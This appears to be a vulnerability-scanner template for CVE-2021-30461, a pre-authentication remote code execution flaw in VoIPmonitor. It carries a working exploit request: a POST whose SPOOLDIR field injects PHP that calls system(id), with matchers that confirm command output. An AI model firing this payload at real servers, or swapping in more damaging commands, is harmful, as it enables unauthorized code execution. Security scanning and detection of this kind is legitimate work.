id: CVE-2021-30461 info: name: VoipMonitor Pre-Auth-RCE author: shifacyclewala,hackergautam severity: critical description: Use of user supplied data, arriving via web interface allows remote unauthenticated users to trigger a remote PHP code execution vulnerability in VoIPmonitor. tags: cve,cve2021,rce,voipmonitor reference: https://ssd-disclosure.com/ssd-advisory-voipmonitor-unauth-rce/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.80 cve-id: CVE-2021-30461 cwe-id: CWE-94 requests: - raw: - | POST /index.php HTTP/1.1 Host: {{Hostname}} Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Content-Type: application/x-www-form-urlencoded SPOOLDIR=test".system(id)."&recheck=Recheck matchers-condition: and matchers: - type: word words: - "uid=" - "gid=" - "groups=" - "VoIPmonitor installation" part: body condition: and - type: status status: - 200